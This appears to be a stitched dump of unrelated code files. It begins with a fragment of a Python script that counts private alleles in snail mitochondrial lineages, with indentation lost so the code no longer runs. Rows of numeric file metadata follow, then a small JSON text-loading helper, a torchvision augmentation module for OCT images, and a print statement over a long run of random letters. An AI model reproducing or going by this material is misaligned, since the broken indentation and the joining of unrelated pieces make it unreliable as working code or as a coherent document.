R3Sites = {">$Duluth":5673.35416667, ">$Heron2":5671, ">$McGregor":5670, ">$Waik36":5679.91666667, ">$WalesC":5678.25, ">$clone_1":5671.33333333, ">$AC51":5670.66666667, ">$Heron_mitochondrion":5670.33333333, ">$clone_7":5671.35416667, ">$Waik37":5676.91666667, ">$Gunn":5672.33333333, ">$DenmarkA":5671.125, ">$Waik372":5671.91666667, ">$Tarawera":5676.91666667, ">$Poerua_triploid":5671.33333333, ">$Kaniere_triploid":5676.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5671.45833333, ">$Brunner_2_4n":5703.10416667, ">$Brunner_6_3n":5695.625, ">$Grasmere_1_4n":5753, ">$Grasmere_6_3n":5672.625, ">$Poerua_72_4n":5682.3125, ">$Rotoiti_1_4n":5687.52083333, ">$*Kaniere_1_2n":5670, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5673.66666667, ">$*Yellow_Contig_56":5675, ">$*Alexsex":5675, ">$*AlexMap":5675, ">$*Lady":5668, ">$*Ianthe":5671.66666667, ">$*Rotoroa_1_2n":5687.25}
C4Sites = {">$Duluth":3422.02083333, ">$Heron2":3419.66666667, ">$McGregor":3420, ">$Waik36":3420.25, ">$WalesC":3423.25, ">$clone_1":3419.33333333, ">$AC51":3419, ">$Heron_mitochondrion":3419, ">$clone_7":3422.6875, ">$Waik37":3424.58333333, ">$Gunn":3420, ">$DenmarkA":3422.45833333, ">$Waik372":3428.25, ">$Tarawera":3424.91666667, ">$Poerua_triploid":3421, ">$Kaniere_triploid":3423.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3421.79166667, ">$Brunner_2_4n":3405.10416659, ">$Brunner_6_3n":3421.95833327, ">$Grasmere_1_4n":3382.99999963, ">$Grasmere_6_3n":3416.95833332, ">$Poerua_72_4n":3422.97916658, ">$Rotoiti_1_4n":3422.85416662, ">$*Kaniere_1_2n":3420.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3420, ">$*Yellow_Contig_56":3420.66666667, ">$*Alexsex":3420.66666667, ">$*AlexMap":3420.66666667, ">$*Lady":3423, ">$*Ianthe":3419.33333333, ">$*Rotoroa_1_2n":3414.91666662}
R4Sites = {">$Duluth":5200.45833333, ">$Heron2":5196.33333333, ">$McGregor":5195, ">$Waik36":5206.83333333, ">$WalesC":5205.83333333, ">$clone_1":5196.66666667, ">$AC51":5196.66666667, ">$Heron_mitochondrion":5196, ">$clone_7":5198.45833333, ">$Waik37":5202.83333333, ">$Gunn":5196.33333333, ">$DenmarkA":5198.41666667, ">$Waik372":5196.5, ">$Tarawera":5202.5, ">$Poerua_triploid":5196, ">$Kaniere_triploid":5203.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5198.41666667, ">$Brunner_2_4n":5215.29166667, ">$Brunner_6_3n":5199.08333333, ">$Grasmere_1_4n":5202.33333333, ">$Grasmere_6_3n":5197.41666667, ">$Poerua_72_4n":5185.54166667, ">$Rotoiti_1_4n":5196.79166667, ">$*Kaniere_1_2n":5195.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5199, ">$*Yellow_Contig_56":5201, ">$*Alexsex":5201, ">$*AlexMap":5201, ">$*Lady":5192.33333333, ">$*Ianthe":5197.66666667, ">$*Rotoroa_1_2n":5200.5}
C5Sites = {">$Duluth":4384.85416667, ">$Heron2":4382.33333333, ">$McGregor":4382, ">$Waik36":4383.58333333, ">$WalesC":4385.58333333, ">$clone_1":4382.33333333, ">$AC51":4382, ">$Heron_mitochondrion":4382.33333333, ">$clone_7":4385.1875, ">$Waik37":4385.58333333, ">$Gunn":4382.66666667, ">$DenmarkA":4385.125, ">$Waik372":4390.58333333, ">$Tarawera":4385.58333333, ">$Poerua_triploid":4383.33333333, ">$Kaniere_triploid":4386.25, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4383.79166667, ">$Brunner_2_4n":4338.9375, ">$Brunner_6_3n":4354.95833333, ">$Grasmere_1_4n":4238, ">$Grasmere_6_3n":4375.95833333, ">$Poerua_72_4n":4354.14583333, ">$Rotoiti_1_4n":4363.35416667, ">$*Kaniere_1_2n":4383.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4384, ">$*Yellow_Contig_56":4381.66666667, ">$*Alexsex":4381.66666667, ">$*AlexMap":4381.66666667, ">$*Lady":4385.33333333, ">$*Ianthe":4384.66666667, ">$*Rotoroa_1_2n":4354.91666667}
R5Sites = {">$Duluth":4237.625, ">$Heron2":4233.66666667, ">$McGregor":4233, ">$Waik36":4243.5, ">$WalesC":4243.5, ">$clone_1":4233.66666667, ">$AC51":4233.66666667, ">$Heron_mitochondrion":4232.66666667, ">$clone_7":4235.95833333, ">$Waik37":4241.83333333, ">$Gunn":4233.66666667, ">$DenmarkA":4235.75, ">$Waik372":4234.16666667, ">$Tarawera":4241.83333333, ">$Poerua_triploid":4233.66666667, ">$Kaniere_triploid":4241.16666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4236.41666667, ">$Brunner_2_4n":4281.45833326, ">$Brunner_6_3n":4266.08333327, ">$Grasmere_1_4n":4347.33333297, ">$Grasmere_6_3n":4238.41666665, ">$Poerua_72_4n":4254.37499992, ">$Rotoiti_1_4n":4256.29166662, ">$*Kaniere_1_2n":4232.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4235, ">$*Yellow_Contig_56":4240, ">$*Alexsex":4240, ">$*AlexMap":4240, ">$*Lady":4230, ">$*Ianthe":4232.33333333, ">$*Rotoroa_1_2n":4260.49999996}
C6Sites = {">$Duluth":4128.5625, ">$Heron2":4124.66666667, ">$McGregor":4124.33333333, ">$Waik36":4130.08333333, ">$WalesC":4129.75, ">$clone_1":4125.66666667, ">$AC51":4124.66666667, ">$Heron_mitochondrion":4125, ">$clone_7":4126.89583333, ">$Waik37":4123.41666667, ">$Gunn":4126.33333333, ">$DenmarkA":4127.04166667, ">$Waik372":4126.08333333, ">$Tarawera":4124.08333333, ">$Poerua_triploid":4126, ">$Kaniere_triploid":4125.75, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4126.04166667, ">$Brunner_2_4n":4078.47916674, ">$Brunner_6_3n":4075.2083334, ">$Grasmere_1_4n":3848.3333337, ">$Grasmere_6_3n":4112.54166668, ">$Poerua_72_4n":4050.43750008, ">$Rotoiti_1_4n":4084.39583338, ">$*Kaniere_1_2n":4126.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4125, ">$*Yellow_Contig_56":4127.33333333, ">$*Alexsex":4127.33333333, ">$*AlexMap":4127.33333333, ">$*Lady":4121, ">$*Ianthe":4123.66666667, ">$*Rotoroa_1_2n":4085.08333338}
R6Sites = {">$Duluth":4493.91666667, ">$Heron2":4491.33333333, ">$McGregor":4490.66666667, ">$Waik36":4497, ">$WalesC":4499.33333333, ">$clone_1":4490.33333333, ">$AC51":4491, ">$Heron_mitochondrion":4490, ">$clone_7":4494.25, ">$Waik37":4504, ">$Gunn":4490, ">$DenmarkA":4493.83333333, ">$Waik372":4498.66666667, ">$Tarawera":4503.33333333, ">$Poerua_triploid":4491, ">$Kaniere_triploid":4501.66666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4494.16666667, ">$Brunner_2_4n":4541.91666674, ">$Brunner_6_3n":4545.8333334, ">$Grasmere_1_4n":4737.00000037, ">$Grasmere_6_3n":4501.83333335, ">$Poerua_72_4n":4558.08333342, ">$Rotoiti_1_4n":4535.25000005, ">$*Kaniere_1_2n":4489.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4494, ">$*Yellow_Contig_56":4494.33333333, ">$*Alexsex":4494.33333333, ">$*AlexMap":4494.33333333, ">$*Lady":4494.33333333, ">$*Ianthe":4493.33333333, ">$*Rotoroa_1_2n":4530.33333338}
C7Sites = {">$Duluth":3873.77083333, ">$Heron2":3870.66666667, ">$McGregor":3870, ">$Waik36":3879.91666667, ">$WalesC":3880.58333333, ">$clone_1":3871.66666667, ">$AC51":3870.66666667, ">$Heron_mitochondrion":3870.33333333, ">$clone_7":3872.10416667, ">$Waik37":3874.25, ">$Gunn":3872.33333333, ">$DenmarkA":3871.625, ">$Waik372":3875.91666667, ">$Tarawera":3874.58333333, ">$Poerua_triploid":3872.66666667, ">$Kaniere_triploid":3875.91666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3870.29166667, ">$Brunner_2_4n":3832.85416667, ">$Brunner_6_3n":3825.79166667, ">$Grasmere_1_4n":3635.33333333, ">$Grasmere_6_3n":3860.45833333, ">$Poerua_72_4n":3801.89583333, ">$Rotoiti_1_4n":3832.9375, ">$*Kaniere_1_2n":3871.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3873.66666667, ">$*Yellow_Contig_56":3877, ">$*Alexsex":3877, ">$*AlexMap":3877, ">$*Lady":3869, ">$*Ianthe":3872.33333333, ">$*Rotoroa_1_2n":3832.58333333}
R7Sites = {">$Duluth":4748.70833333, ">$Heron2":4745.33333333, ">$McGregor":4745, ">$Waik36":4747.16666667, ">$WalesC":4748.5, ">$clone_1":4744.33333333, ">$AC51":4745, ">$Heron_mitochondrion":4744.66666667, ">$clone_7":4749.04166667, ">$Waik37":4753.16666667, ">$Gunn":4744, ">$DenmarkA":4749.25, ">$Waik372":4748.83333333, ">$Tarawera":4752.83333333, ">$Poerua_triploid":4744.33333333, ">$Kaniere_triploid":4751.5, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4749.91666667, ">$Brunner_2_4n":4787.54166659, ">$Brunner_6_3n":4795.24999994, ">$Grasmere_1_4n":4949.99999963, ">$Grasmere_6_3n":4753.91666665, ">$Poerua_72_4n":4806.62499992, ">$Rotoiti_1_4n":4786.70833328, ">$*Kaniere_1_2n":4744, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4745.33333333, ">$*Yellow_Contig_56":4744.66666667, ">$*Alexsex":4744.66666667, ">$*AlexMap":4744.66666667, ">$*Lady":4746.33333333, ">$*Ianthe":4744.66666667, ">$*Rotoroa_1_2n":4782.83333329}
meanCSites = {">$Duluth":4310.80952381, ">$Heron2":4307.57142857143, ">$McGregor":4307.14285714286, ">$Waik36":4313.14285714286, ">$WalesC":4314.99999999857, ">$clone_1":4307.80952381, ">$AC51":4307.04761904857, ">$Heron_mitochondrion":4307.04761904714, ">$clone_7":4310.19047619, ">$Waik37":4311.76190476143, ">$Gunn":4308.57142857, ">$DenmarkA":4310.04761904714, ">$Waik372":4314.52380952286, ">$Tarawera":4312.28571428429, ">$Poerua_triploid":4308.90476190571, ">$Kaniere_triploid":4312.80952380857, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4308.85714285857, ">$Brunner_2_4n":4273.47619044429, ">$Brunner_6_3n":4277.52380949714, ">$Grasmere_1_4n":4132.47619031857, ">$Grasmere_6_3n":4299.99999999429, ">$Poerua_72_4n":4263.99999996286, ">$Rotoiti_1_4n":4283.76190474143, ">$*Kaniere_1_2n":4308.23809523714, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4309.19047619, ">$*Yellow_Contig_56":4311, ">$*Alexsex":4311, ">$*AlexMap":4311, ">$*Lady":4307.52380952286, ">$*Ianthe":4308.52380952286, ">$*Rotoroa_1_2n":4280.80952379}
meanRSites = {">$Duluth":4311.66964285714, ">$Heron2":4308.42857142857, ">$McGregor":4307.85714285714, ">$Waik36":4313.94047619, ">$WalesC":4314.08333333143, ">$clone_1":4308.19047619, ">$AC51":4308.61904762, ">$Heron_mitochondrion":4307.95238095286, ">$clone_7":4310.95535714286, ">$Waik37":4315.65476190571, ">$Gunn":4307.76190476143, ">$DenmarkA":4310.82738095286, ">$Waik372":4310.22619047714, ">$Tarawera":4315.13095238, ">$Poerua_triploid":4308.09523809429, ">$Kaniere_triploid":4314.60714285714, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4311.35119047714, ">$Brunner_2_4n":4346.91964284714, ">$Brunner_6_3n":4343.51785713429, ">$Grasmere_1_4n":4452.85714280429, ">$Grasmere_6_3n":4314.37499999857, ">$Poerua_72_4n":4344.52083332286, ">$Rotoiti_1_4n":4335.88392856429, ">$*Kaniere_1_2n":4307.42857142714, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4309.80952381, ">$*Yellow_Contig_56":4310.66666666571, ">$*Alexsex":4310.66666666571, ">$*AlexMap":4310.66666666571, ">$*Lady":4307.80952380714, ">$*Ianthe":4308.47619047714, ">$*Rotoroa_1_2n":4334.60714285143}
logfile = open(fasta[0:-5] + '_singletons.log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
refSeq = seqDict[popList[0]]
synDict = {}
meanCDict = {}
meanRDict = {}
C1Dict = {}
R1Dict = {}
C2Dict = {}
R2Dict = {}
C3Dict = {}
R3Dict = {}
C4Dict = {}
R4Dict = {}
C5Dict = {}
R5Dict = {}
C6Dict = {}
R6Dict = {}
C7Dict = {}
R7Dict = {}
for site in range(len(refSeq)):
codonNum = site/3
pos = (site+1)%3
if pos == 1:
nucPos = 1
elif pos == 2:
nucPos = 2
elif pos == 0:
nucPos = 3
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if site >= start and site <= stop:
gene = positionDict[locus]
geneStart = locus[0]
if site == geneStart or site == (geneStart+1) or site == (geneStart + 2):
startCodon = True
else:
startCodon = False
currAlleleDict = {}
currAlleleList = []
currCodonDict = {}
currCodonList = []
allele2CodonTable = {}
for seq in popList:
if seq not in synDict:
synDict[seq] = 0
meanCDict[seq] = 0
meanRDict[seq] = 0
C1Dict[seq] = 0
R1Dict[seq] = 0
C2Dict[seq] = 0
R2Dict[seq] = 0
C3Dict[seq] = 0
R3Dict[seq] = 0
C4Dict[seq] = 0
R4Dict[seq] = 0
C5Dict[seq] = 0
R5Dict[seq] = 0
C6Dict[seq] = 0
R6Dict[seq] = 0
C7Dict[seq] = 0
R7Dict[seq] = 0
currSeq = seqDict[seq]
currCodons = codonDict[seq]
currNuc = currSeq[site]
currCodon = currCodons[codonNum]
allele2CodonTable[currNuc] = currCodon
if currCodon not in currCodonList and 'N' not in currCodon and '-' not in currCodon:
currCodonDict[currCodon] = [seq]
currCodonList.append(currCodon)
if currNuc not in currAlleleList:
currAlleleList.append(currNuc)
currAlleleDict[currNuc] = [seq]
else:
currList = currAlleleDict[currNuc]
currList.append(seq)
currAlleleDict[currNuc] = currList
elif 'N' not in currCodon and '-' not in currCodon:
currCodonSeqList = currCodonDict[currCodon]
currCodonSeqList.append(seq)
currCodonDict[currCodon] = currCodonSeqList
currList = currAlleleDict[currNuc]
currList.append(seq)
currAlleleDict[currNuc] = currList
if len(currAlleleDict) > 1:
singletonList = []
currAAList = []
for allele in currAlleleList:
if len(currAlleleDict[allele]) == 1:
singletonList.append(allele)
if len(singletonList) > 0 and len(currCodonDict) == 2:
if startCodon == True:
if currCodonList[0] in startCodons:
currAAList.append('M')
else:
currAAList.append(geneticCode[currCodonList[0]])
if currCodonList[1] not in startCodons and geneticCode[currCodonList[1]] not in currAAList:
currAAList.append(geneticCode[currCodonList[1]])
elif geneticCode[currCodonList[1]] not in currAAList:
currAAList.append('M')
else:
currAAList.append(geneticCode[currCodonList[0]])
if geneticCode[currCodonList[1]] not in currAAList:
currAAList.append(geneticCode[currCodonList[1]])
if len(currAAList) == 1:
currLineage = currAlleleDict[singletonList[0]]
synDict[currLineage[0]] += 1
else:
currLineage = currAlleleDict[singletonList[0]]
mutType = CRI(currAAList)
if mutType[0] == 0:
C1Dict[currLineage[0]] += 1
else:
R1Dict[currLineage[0]] += 1
if mutType[1] == 0:
C2Dict[currLineage[0]] += 1
else:
R2Dict[currLineage[0]] += 1
if mutType[2] == 0:
C3Dict[currLineage[0]] += 1
else:
R3Dict[currLineage[0]] += 1
if mutType[3] == 0:
C4Dict[currLineage[0]] += 1
else:
R4Dict[currLineage[0]] += 1
if mutType[4] == 0:
C5Dict[currLineage[0]] += 1
else:
R5Dict[currLineage[0]] += 1
if mutType[5] == 0:
C6Dict[currLineage[0]] += 1
else:
R6Dict[currLineage[0]] += 1
if mutType[6] == 0:
C7Dict[currLineage[0]] += 1
else:
R7Dict[currLineage[0]] += 1
if mutType[7] <= 0.5:
meanCDict[currLineage[0]] += 1
else:
meanRDict[currLineage[0]] += 1
elif len(singletonList) > 0:
logfile.write(str(site+1) + '\t' + str(nucPos) + '\t' + str(codonNum +1) + '\n')
sys.stdout.write('Lineage\t#Syn Private Alleles\t# Syn Sites\t# meanC Private Alleles\t# meanC Sites\t# meanR Private Alleles\t# meanR Sites\t# C1 Private Alleles\t# C1 Sites\t# R1 Private Alleles\t# R1 Sites\t# C2 Private Alleles\t# C2 Sites\t# R2 Private Alleles\t# R2 Sites\t# C3 Private Alleles\t# C3 Sites\t# R3 Private Alleles\t# R3 Sites\t# C4 Private Alleles\t# C4 Sites\t# R4 Private Alleles\t# R4 Sites\t# C5 Private Alleles\t# C5 Sites\t# R5 Private Alleles\t# R5 Sites\t# C6 Private Alleles\t# C6 Sites\t# R6 Private Alleles\t# R6 Sites\t# C7 Private Alleles\t# C7 Sites\t# R7 Private Alleles\t# R7 Sites\n')
for lineage in popList:
sys.stdout.write(lineage + '\t' + str(synDict[lineage]) + '\t' + str(synSites[lineage]) + '\t' + str(meanCDict[lineage]) + '\t' + str(meanCSites[lineage]) + '\t' + str(meanRDict[lineage]) + '\t' + str(meanRSites[lineage]) + '\t' + str(C1Dict[lineage]) + '\t' + str(C1Sites[lineage]) + '\t' + str(R1Dict[lineage]) + '\t' + str(R1Sites[lineage]) + '\t' + str(C2Dict[lineage]) + '\t' + str(C2Sites[lineage]) + '\t' + str(R2Dict[lineage]) + '\t' + str(R2Sites[lineage]) + '\t' + str(C3Dict[lineage]) + '\t' + str(C3Sites[lineage]) + '\t' + str(R3Dict[lineage]) + '\t' + str(R3Sites[lineage]) + '\t' + str(C4Dict[lineage]) + '\t' + str(C4Sites[lineage]) + '\t' + str(R4Dict[lineage]) + '\t' + str(R4Sites[lineage]) + '\t' + str(C5Dict[lineage]) + '\t' + str(C5Sites[lineage]) + '\t' + str(R5Dict[lineage]) + '\t' + str(R5Sites[lineage]) + '\t' + str(C6Dict[lineage]) + '\t' + str(C6Sites[lineage]) + '\t' + str(R6Dict[lineage]) + '\t' + str(R6Sites[lineage]) + '\t' + str(C7Dict[lineage]) + '\t' + str(C7Sites[lineage]) + '\t' + str(R7Dict[lineage]) + '\t' + str(R7Sites[lineage]) + '\n')
#polSub(sys.argv[1])
| 86.680325
| 41,208
| 0.326568
| 54,622
| 480,209
| 2.807404
| 0.01926
| 0.016173
| 0.049665
| 0.009808
| 0.819904
| 0.811303
| 0.808185
| 0.801208
| 0.790539
| 0.785492
| 0
| 0.059553
| 0.397783
| 480,209
| 5,540
| 41,209
| 86.680325
| 0.470708
| 0.01203
| 0
| 0.841101
| 0
| 0.013663
| 0.118269
| 0.01059
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.000187
| null | null | 0.000187
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6af8ecc77f930778f2b0868923c0710276607ca3
| 714
|
py
|
Python
|
lib/text.py
|
nuriddinislamov/birthdaybook
|
f71f79e1f1cbaa176c9edbdcb64ff1574466752d
|
[
"MIT"
] | null | null | null |
lib/text.py
|
nuriddinislamov/birthdaybook
|
f71f79e1f1cbaa176c9edbdcb64ff1574466752d
|
[
"MIT"
] | null | null | null |
lib/text.py
|
nuriddinislamov/birthdaybook
|
f71f79e1f1cbaa176c9edbdcb64ff1574466752d
|
[
"MIT"
] | null | null | null |
import json
j = json.load(open("lib/text.json", "r", encoding="utf-8"))
def t(key: str, lang: str):
"""b Function that gets the text for the bot from text.json
Args:
key (str): [key for the json to find the right piece of text]
lang (str): [language of the given text]
Returns:
[str]: [Text from texts.json]
"""
return j["text"][key][lang]
def b(key: str, lang: str):
"""b Function that gets the text of a button in the bot from text.json
Args:
key (str): [key for the json to find the right piece of text]
lang (str): [language of the given text]
Returns:
[str]: [Text from texts.json]
"""
return j["button"][key][lang]
| 27.461538
| 74
| 0.595238
| 116
| 714
| 3.663793
| 0.327586
| 0.056471
| 0.047059
| 0.061176
| 0.781176
| 0.781176
| 0.781176
| 0.781176
| 0.781176
| 0.781176
| 0
| 0.001919
| 0.270308
| 714
| 25
| 75
| 28.56
| 0.81382
| 0.621849
| 0
| 0
| 0
| 0
| 0.138756
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
ed285a1155c6bfe3bb6fa936161815a9b20c87d8
| 1,363
|
py
|
Python
|
benchmarks/oct/aug_oct.py
|
paaatcha/my-thesis
|
e72644e0d7c8a4b6f75cf7e462d32001cbf2c75d
|
[
"MIT"
] | 5
|
2020-11-12T20:11:09.000Z
|
2021-03-01T12:44:05.000Z
|
benchmarks/oct/aug_oct.py
|
paaatcha/my-thesis
|
e72644e0d7c8a4b6f75cf7e462d32001cbf2c75d
|
[
"MIT"
] | null | null | null |
benchmarks/oct/aug_oct.py
|
paaatcha/my-thesis
|
e72644e0d7c8a4b6f75cf7e462d32001cbf2c75d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Autor: André Pacheco
Email: pacheco.comp@gmail.com
Image augmentation classes for OCT dataset
"""
from imgaug import augmenters as iaa
import numpy as np
import torchvision
class ImgTrainTransform:
def __init__(self, size=(224,224), normalization=([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])):
self.normalization = normalization
self.size = size
def __call__(self, img):
transforms = torchvision.transforms.Compose([
torchvision.transforms.Resize(self.size),
torchvision.transforms.RandomHorizontalFlip(p=0.5),
torchvision.transforms.RandomVerticalFlip(p=0.2),
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(self.normalization[0], self.normalization[1]),
])
return transforms(img)
class ImgEvalTransform:
def __init__(self, size=(224,224), normalization=([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])):
self.normalization = normalization
self.size = size
def __call__(self, img):
transforms = torchvision.transforms.Compose([
torchvision.transforms.Resize(self.size),
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(self.normalization[0], self.normalization[1]),
])
return transforms(img)
| 30.288889
| 101
| 0.658841
| 151
| 1,363
| 5.84106
| 0.357616
| 0.238095
| 0.024943
| 0.034014
| 0.706349
| 0.706349
| 0.706349
| 0.706349
| 0.706349
| 0.706349
| 0
| 0.064607
| 0.216434
| 1,363
| 44
| 102
| 30.977273
| 0.761236
| 0.08584
| 0
| 0.740741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.148148
| false
| 0
| 0.111111
| 0
| 0.407407
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed2bbfb9e84ad6a65fdfca46665a84b2dedd4e84
| 20,855
|
py
|
Python
|
Google Developer Day 2011 (1-line).py
|
luizdomingo/Arquivos-Python
|
74864d1ae1fb07ed54e4eb2ff7083097745489bd
|
[
"MIT"
] | null | null | null |
Google Developer Day 2011 (1-line).py
|
luizdomingo/Arquivos-Python
|
74864d1ae1fb07ed54e4eb2ff7083097745489bd
|
[
"MIT"
] | null | null | null |
Google Developer Day 2011 (1-line).py
|
luizdomingo/Arquivos-Python
|
74864d1ae1fb07ed54e4eb2ff7083097745489bd
|
[
"MIT"
] | null | null | null |
print(
'Questão A: O Texto B possui %d preposições\n'
'Questão B: O Texto B possui %d verbos\n'
'Questão C: O Texto B possui %d verbos na primeira pessoa\n'
'Questão D: %s\nQuestão E: O Texto B possui %d números bonito' % (
len([WORD for WORD in
'pwbfdmtc jms gswg wvsscb ffq lbrhbn lcxc hcr thc mghts vkgfc nrvfgs dsrdq tcmfz scqskgsl twgzh whts dqt twtksl lcrdlc dpzrl hwlqvc xcfstz rfkvbr bzmvqp qxrs jlmwtcs nmjkkmpg kbcbg shdf qxpm qbm hlcnqnw jwhvvrtr kccw njxtbh hbtn lqmxbx krnn hcv ptqtwp xgnfggb bjdd nfgkxsw kgzcf bgncx rbsfrrcf vjwsjpw jbtcbqm xhhg kfpqcpx bfxlg qddzdv rvfqp hphjhns xhk npdd gsxm ffkbj gwdxkhr ddqmr jnzznp jzsgkb lcgsgjvh xvsbdw klzsxz xpjkjxc gth dtrmkn qzcsksd vsdrhj vtlxg kdtxsj sgs chnz bdllcsdl trggnlpd gwbvj stnhs vqbhj tdhps sgkk mxnswm ghm sqhfcnlk lpwqpn gcgg mjxh prmqclss zfn gplktxj vkjnkkv fzzx vdslwsdk fxt pnbqqbk ksfgcvw hxfq xxd rvqzhmm ctvfgxzv nrzdkx nsxmr bnvkmhcl srvc nczkp zbgsxg nmpx vrqq xfmnsjc zszmrfjv cbwjfldn fgn mzpp crjnct cmh cwh cvdk cslq tvr gggck pfs thfdcpxt fcffvg bwxr bstbzwsx ghhq ldzzlkg zmfkxvms lfn zzzfchrk lktdlrlx wzjcvj nbbkqjt lthk wnxsmnx dzftkjr fqfqcjtd dzsvqbnx zhprp cqlphsk cjvrwg fkhr mxrg tdbxnwrg sdcptlln tjsh vbmd vlgfskcx xtkdp ttjcc qtlmgsh kbndtscg nfw kctx rcltszw hbjr zld npqqm bpcqrhq szzw vbxj ghhmdq nhfptrsg vpkgwcd rkkxqk jhxpngr qnkfd wvcsmb bgnvwqln gfbrqn rjjp dvfqjqsf rspxz cvrjxjq gtps fbg rdp pbzqnc nssd rrpzcwp drfrgjx wvcpw fst frp lmz gbb brzbhlns qsjgzzzp jwvbhl pchqk vhpbdwd mwtlm wbdxk rsfpxl kqt psr bcdktps mrgnflhr fvxsmsbx rqprpvj clnr hdqzjc bndwhjwp fbbkvdhr mlgtjw ntk pxv nsnv jnwp vtksnpbb lpwl rslljk hsd rzfmdp xlbnkbw ptfhnlc jjc dpptqzc jgrt jgxn bgg hslbhksz lhld jfdjq mmttm hwjbnqwv dcxggwhc dcnhhltm fttbf xjnjhgh tchctgjn fvjkmj wkfxqzkx knbhrwgs xmszj smnrwmlv cdbdwsjf grtkzrwh rwmbvt zssswpc cdvr klhtb bhkwfwxm bdjzlg nnw hnw fkm dzxpk fmvx kwfj vbf bgp frfbhk kvqwc skddwrtg brgkfqnf xmwth wrmv rzmjrbfb pkj hckr sfbvz vtfbq fmzf tkhnb srd slkbcmj ppq kxgdbxhh grwpg hxhjznc ttmgnwb lljfz ftkgv fsjmrvcx dljps mtgnc bkwfwfnj npfvr qlgpv hmqhxfpb vvwtkrf nfchzb phmhxkck ngrngr lvd dgbwpk txlttnpb ppldgl wsmngb xtxsblgt xxtctgsj pbvtkm pmcmrmvf phcxvpf wtbfv mvclz dvsl tmzxrrg gbjz dtlsp klmjxg fxh svtlgdl vvlhntpt zgtkjdm lbjrnmt fbbhqvg dwqnsgj bjjcsvms tlpzlxj bcw rtvmzn kjtqpxhw zkvkdxz dcx zqmsnl rvqw kgsh gbwdh wslrbz pfnpqh mgj kgmq hpzmp kpr jgz bksx lvsbxzv qgzf qcgpc pvf xlt znjntxpj stgwsc vxgcfc cbvwhf tbxwpk nbjbkrz rgc wps rjlfpch bxqhw nckdtf bsncq cnsmqxwn mzmlgpp vnxr qgjs vpkpbsn tgmw lbcxxgsf nnmr wbpdssgm nmddl zcbpcbpt twrkx sdqxsnw lntr rzv hgjjksxf qpnnjwl hbcv fkwkbd ncv plr lmpfkk dpcj jzjbjgp bdttl wrrdnmjz mxqxqdxc shztl gdzj rntpnh rjrlrfk rncp qlrhnww rdzhzx qnnxhm gtd lqklxr gpgpqtrc hfhp hxl bnr fpvxzwmx pfrxglb xmchrvwx wbnxl vjxgbs vddhjkq wndwxs mqndvm hvbncjw pbmlw hzjwqn nfgxqmb pfvnpwj xbwknvmr xtm cnxck qnmtrvx kmhj hdfrtd gqz srlml ckx pwlhnpgf rkln tvq vjgrlfs vpvwnjtg wbswcvbh dzcjppjm slt zvxhgq xhcvvc rjd xhqdvhmp nqlnsk hxmjpmnv sjwwc hbjvpw dpmdnz sxpb qznnxl nwnlmbx vdb hgkkwd znsxfqs kqwjtrcg vhbnd rpgtkzz fmt nmzhrrqn qbqbvpsm kqwxr gvp xvrvsdf pxwt vkdns dpf jwnwz mxpwc xdvs drrlpnr xvpztf pxzm jtg fvfgnzx qndpq dmzwnfgm jzknzgk clbpzcpd xhxsqp zbfck btzjd jwbt gwtll kqj wlsdx sdvnw mqpvxk kjdkt frgwz mpqnqr lpj gvc hcdp zpvrdnc ckvmtbvf bddvc mptrq xrzwj lzlbc pvgkrhd wlkdtjz pslzhzhc qmrr crkxcs jtxhfvr qzd fwrgdmjt cmg xvhcb zmllbxs mxg plzxjqlk cwnf 